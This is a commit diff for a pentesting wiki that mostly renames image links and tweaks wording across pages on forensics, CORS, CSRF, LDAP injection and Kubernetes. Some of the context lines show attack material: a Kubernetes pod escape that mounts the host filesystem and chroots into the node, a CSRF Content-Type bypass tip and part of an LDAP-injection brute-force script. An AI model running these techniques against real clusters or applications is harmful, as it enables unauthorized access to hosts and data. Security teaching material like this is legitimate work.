GitBook: [master] 8 pages and 14 assets modified
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 13 KiB After Width: | Height: | Size: 13 KiB |
Before Width: | Height: | Size: 2.8 KiB After Width: | Height: | Size: 2.8 KiB |
|
@ -134,7 +134,7 @@ Some interesting attributes:
|
|||
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
|
||||
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28509%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28512%29.png)
|
||||
|
||||
|
|
|
@ -32,7 +32,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche
|
|||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28495%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png)
|
||||
|
||||
### Volume Shadow Copies
|
||||
|
||||
|
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28477%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -593,7 +593,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
|
|||
5. Reproduce the problem.
|
||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||
|
||||
![](../../.gitbook/assets/image%20%28466%29%20%281%29.png)
|
||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
|
||||
|
||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||
|
||||
|
|
|
@ -89,9 +89,13 @@ Access-Control-Max-Age: 240
|
|||
|
||||
![](../.gitbook/assets/preflight.svg)
|
||||
|
||||
Note that in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
|
||||
Note that usually \(depending on the content-type and headers set\) in a **GET/POST request no pre-flight request is sent** \(the request is sent **directly**\), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.
|
||||
**Therefore, CORS doesn't protect against CSRF \(but it can be helpful\).**
|
||||
|
||||
{% hint style="info" %}
|
||||
**Check** [**in this link**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) **the conditions of a request to avoid sending of a pre-flight request**
|
||||
{% endhint %}
|
||||
|
||||
## Exploitable misconfigurations
|
||||
|
||||
Notice that most of the **real attacks require `Access-Control-Allow-Credentials`** to be set to **`true`** because this will allow the browser to send the credentials and read the response. Without credentials, many attacks become irrelevant; it means you can't ride on a user's cookies, so there is often nothing to be gained by making their browser issue the request rather than issuing it yourself.
|
||||
|
|
|
@ -73,7 +73,13 @@ In this situation, the attacker can again perform a CSRF **attack if the web sit
|
|||
|
||||
### Content-Type change
|
||||
|
||||
You can change to POST Content-Type to _**application/json, application/x-url-encoded**_ or _**form-multipart**_ and maybe you will be able to bypass the CSRF token.
|
||||
According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests), n order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values:
|
||||
|
||||
* **`application/x-www-form-urlencoded`**
|
||||
* **`multipart/form-data`**
|
||||
* **`text/plain`**
|
||||
|
||||
However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._
|
||||
|
||||
### Referrer / Origin check bypass
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ LDAP Injection is an attack used to exploit web based applications that construc
|
|||
**Filterlist** = 1\*filter
|
||||
**Item**= simple / present / substring
|
||||
**Simple** = attr filtertype assertionvalue
|
||||
**Filtertype** = _'=' / '~=' / '>=' / '<='_
|
||||
**Filtertype** = _'=' / '~=' / '>=' / '<='_
|
||||
**Present** = attr = \*
|
||||
**Substring** = attr ”=” \[initial\] \* \[final\]
|
||||
**Initial** = assertionvalue
|
||||
|
@ -128,7 +128,7 @@ You can iterate over the ascii letters, digits and symbols:
|
|||
|
||||
### **Discover valid LDAP fields**
|
||||
|
||||
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of ****[**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**.**
|
||||
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
|
||||
|
||||
```python
|
||||
#!/usr/bin/python3
|
||||
|
@ -156,7 +156,7 @@ for attribute in attributes: #Extract all attributes
|
|||
if "Cannot login" in r.text:
|
||||
value += str(char)
|
||||
break
|
||||
|
||||
|
||||
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
|
||||
finish = True
|
||||
print()
|
||||
|
|
|
@ -76,11 +76,13 @@ The following `kubectl` commands indicates just how to list the objects. If you
|
|||
{% endhint %}
|
||||
|
||||
### Using kubectl
|
||||
|
||||
when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
|
||||
|
||||
```bash
|
||||
alias kubectl='kubectl --token=<jwt_token>'
|
||||
|
||||
```
|
||||
|
||||
[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
|
||||
|
||||
### Get namespaces
|
||||
|
@ -273,12 +275,10 @@ If you are able to create new pods you might be able to escape from them to the
|
|||
|
||||
```bash
|
||||
kubectl get pod <name> [-n <namespace>] -o yaml
|
||||
|
||||
```
|
||||
|
||||
Then you create your attack.yaml file
|
||||
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
|
@ -300,35 +300,29 @@ spec:
|
|||
- name: host-fs
|
||||
mountPath: /root
|
||||
restartPolicy: Never
|
||||
|
||||
```
|
||||
|
||||
[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
|
||||
|
||||
After that you create the pod
|
||||
|
||||
```bash
|
||||
kubectl apply -f attacker.yaml [-n <namespace>]
|
||||
|
||||
```
|
||||
|
||||
Now you can switch to the created pod as follows
|
||||
|
||||
```bash
|
||||
kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
|
||||
|
||||
```
|
||||
|
||||
And finally you chroot into the node's system
|
||||
|
||||
```bash
|
||||
chroot /root /bin/bash
|
||||
|
||||
```
|
||||
|
||||
Information obtained from:\
|
||||
[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
|
||||
[Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
|
||||
Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
|
||||
## Sniffing
|
||||
|
||||
|
|
|
@ -113,5 +113,3 @@ y por aqui la metodologia owasp para analizar firmware: [https://github.com/scri
|
|||
* [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) : This list aims to cover Electron.js security related topics.
|
||||
* [https://github.com/serain/bbrecon](https://github.com/serain/bbrecon) : Info about BB programs
|
||||
|
||||
##
|
||||
|
||||
|
|